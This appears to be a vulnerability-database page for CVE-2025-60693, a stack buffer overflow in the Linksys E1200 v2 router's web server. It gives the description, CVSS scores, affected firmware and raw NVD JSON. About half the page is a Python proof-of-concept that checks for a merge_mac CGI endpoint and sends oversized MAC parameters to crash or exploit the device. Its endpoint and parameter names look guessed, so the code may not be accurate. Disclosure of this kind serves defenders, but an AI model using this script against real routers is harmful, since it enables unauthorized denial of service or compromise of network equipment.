Security Vulnerability Report
中文
CVE-2025-60693 CVSS 6.5 MEDIUM

CVE-2025-60693

Published: 2025-11-13 18:15:53
Last Modified: 2025-11-17 19:55:49
Source: [email protected]

Description

A stack-based buffer overflow exists in the get_merge_mac function of the httpd binary on Linksys E1200 v2 routers (Firmware E1200_v2.0.11.001_us.tar.gz). The function concatenates up to six user-supplied CGI parameters matching <parameter>_0~5 into a fixed-size buffer (a2) without proper bounds checking, appending colon delimiters during concatenation. Remote attackers can exploit this vulnerability via specially crafted HTTP requests to execute arbitrary code or cause denial of service without authentication.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:linksys:e1200_firmware:2.0.11.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:e1200:2:*:*:*:*:*:*:* - NOT VULNERABLE
Linksys E1200 v2 < 固件版本 E1200_v2.0.11.001_us

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60693 PoC - Linksys E1200 v2 get_merge_mac Stack Buffer Overflow # Target: Linksys E1200 v2 router (Firmware E1200_v2.0.11.001_us.tar.gz) # Vulnerability: Stack-based buffer overflow in get_merge_mac function def exploit_cve_2025_60693(target_ip, target_port=80): """ Exploit for CVE-2025-60693 This PoC demonstrates the buffer overflow by sending oversized parameters. Modify the payload based on actual firmware analysis. """ base_url = f"http://{target_ip}:{target_port}" # Generate oversized parameters to trigger overflow # The function concatenates parameters _0 to _5 with colon delimiters # Total length exceeding the fixed buffer size will cause overflow overflow_length = 1024 # Adjust based on buffer size analysis padding = 'A' * overflow_length # Construct malicious CGI parameters params = { 'mac_0': padding, 'mac_1': padding, 'mac_2': padding, 'mac_3': padding, 'mac_4': padding, 'mac_5': padding } try: # Send crafted HTTP request response = requests.get(f"{base_url}/cgi-bin/merge_mac", params=params, timeout=10) print(f"[*] Request sent to {base_url}/cgi-bin/merge_mac") print(f"[*] Response status: {response.status_code}") except requests.exceptions.Timeout: print("[*] Request timed out - possible successful exploitation") except Exception as e: print(f"[!] Error: {e}") def check_vulnerability(target_ip, target_port=80): """ Check if target is vulnerable to CVE-2025-60693 """ base_url = f"http://{target_ip}:{target_port}" # Small test payload to check if merge_mac endpoint exists test_params = { 'mac_0': 'test', 'mac_1': 'test' } try: response = requests.get(f"{base_url}/cgi-bin/merge_mac", params=test_params, timeout=5) if response.status_code == 200: print(f"[*] Target {target_ip} has merge_mac endpoint") print(f"[*] Target may be vulnerable - proceed with exploitation") return True else: print(f"[*] Endpoint returned status {response.status_code}") return False except Exception as e: print(f"[!] Error checking vulnerability: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_60693_poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print(f"[*] Checking vulnerability on {target}...") if check_vulnerability(target, port): print(f"[*] Attempting exploitation...") exploit_cve_2025_60693(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60693", "sourceIdentifier": "[email protected]", "published": "2025-11-13T18:15:53.040", "lastModified": "2025-11-17T19:55:48.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow exists in the get_merge_mac function of the httpd binary on Linksys E1200 v2 routers (Firmware E1200_v2.0.11.001_us.tar.gz). The function concatenates up to six user-supplied CGI parameters matching <parameter>_0~5 into a fixed-size buffer (a2) without proper bounds checking, appending colon delimiters during concatenation. Remote attackers can exploit this vulnerability via specially crafted HTTP requests to execute arbitrary code or cause denial of service without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:e1200_firmware:2.0.11.001:*:*:*:*:*:*:*", "matchCriteriaId": "2461F974-2121-490C-A6CD-18B006070679"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:e1200:2:*:*:*:*:*:*:*", "matchCriteriaId": "4B14B800-5FCA-4E2B-A42B-EBE6EEC8FBB1"}]}]}], "references": [{"url": "http://linksys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/Linksys/Linksys-E1200/CVE-2025-60693.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.linksys.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.